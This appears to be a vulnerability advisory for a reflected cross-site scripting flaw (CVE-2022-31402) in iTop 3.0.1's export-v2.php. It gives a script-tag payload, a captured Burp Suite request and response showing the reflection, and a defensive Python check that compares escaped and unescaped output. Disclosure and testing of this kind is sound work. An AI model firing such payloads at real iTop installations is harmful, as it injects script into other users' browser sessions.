iTop 3.0.1 XSS Vulnerability
# CVE-2022-31402
AFFECTED PAGE
/itop/webservices/export-v2.php
VERSION
ITOP - 3.0.1
EXAMPLE PAYLOAD
"()%26%25<acx><ScRiPt >DFre(9740)</ScRiPt>
BURP SUITE REQUEST
> HTTP REQUESTS WITH BURP SUITE --------------
>
> GET /itop/webservices/export-v2.php"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt> HTTP/1.1
> Referer: http://localhost/itop/
> Cookie: PHPSESSID=hp7p9olp8rq01ramfa6li7nn0j; MANTIS_secure_session=1
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Encoding: gzip,deflate,br
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
> Host: 192.168.1.4
> Connection: Keep-alive
>
> HTTP RESPONSE WITH BURP SUITE
>
> HTTP/1.1 200 OK
> Date: Tue, 29 Mar 2022 02:30:55 GMT
> Server: Apache/2.4.41 (Ubuntu)
> Cache-Control: no-store, no-cache, must-revalidate
> Last-Modified: Tue, 29 Mar 2022 02:30:55 GMT
> X-Content-Type-Options: nosniff
> Expires: Tue, 29 Mar 2022 02:30:55 GMT
> X-Frame-Options: DENY
> Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
> Vary: Accept-Encoding
> Content-Length: 771
> Keep-Alive: timeout=5, max=93
> Connection: Keep-Alive
> Content-Type: application/opensearchdescription+xml
> Original-Content-Encoding: gzip
>
> <?xml version="1.0" encoding="UTF-8" ?><OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
> \t<ShortName>opensearch_text'"()&acx><script >n8zn(9266)</script>_short</ShortName>
> \t<Description>opensearch_text'"()&acx><script >n8zn(9266)</script>_description</Description>
> \t<InputEncoding>UTF-8</InputEncoding>
> \t<Image width="16" height="16" type="image/x-icon">http://localhost/itop/images/favicon.ico</Image>
> \t<Url type="text/html" method="GET" template="http://localhost/itop/webservices/export-v2.php?type=1&temporary=y&handler_id=[all]&search={searchTerms}"></Url>';
> \t<moz:SearchForm>http://localhost/itop/webservices/export-v2.php</moz:SearchForm>
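
A regression check for the reflection visible in the response above, as an added example that is not part of the original advisory and is not iTop's code. `render_unescaped`, `render_escaped` and `injected_markup` are hypothetical helpers, and the sample value is constructed from the `ShortName` element in the response.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

OS_NS = "http://a9.com/-/spec/opensearch/1.1/"
TEXT_ONLY = ("ShortName", "Description")  # elements that must hold plain text

# Constructed sample: the value reflected into ShortName in the response above.
REFLECTED = "opensearch_text'\"()&acx><script >n8zn(9266)</script>"

# Hypothetical template, reduced to the two elements that carry the reflection.
TEMPLATE = (
    '<OpenSearchDescription xmlns="{ns}">'
    "<ShortName>{label}_short</ShortName>"
    "<Description>{label}_description</Description>"
    "</OpenSearchDescription>"
)

def render_unescaped(label: str) -> str:
    """Behaviour shown in the advisory: the label is pasted into the XML raw."""
    return TEMPLATE.format(ns=OS_NS, label=label)

def render_escaped(label: str) -> str:
    """Hardened form: &, <, > and both quote characters become entities."""
    safe = escape(label, {'"': "&quot;", "'": "&apos;"})
    return TEMPLATE.format(ns=OS_NS, label=safe)

def injected_markup(xml_text: str) -> list:
    """Return findings for a response body; an empty list means clean."""
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError as exc:
        # A raw '&' or unbalanced tag from reflected input breaks the document.
        return [f"body is not well-formed XML: {exc}"]
    findings = []
    for name in TEXT_ONLY:
        for el in root.iter(f"{{{OS_NS}}}{name}"):
            for child in el:  # any child element here came from injected markup
                tag = child.tag.rsplit("}", 1)[-1]
                findings.append(f"<{name}> contains element <{tag}>")
    return findings

if __name__ == "__main__":
    print("unescaped:", injected_markup(render_unescaped(REFLECTED)))
    print("escaped:  ", injected_markup(render_escaped(REFLECTED)))
```

Run `injected_markup` against the body returned by a patched instance; an empty list means the reflected value was emitted as text rather than markup.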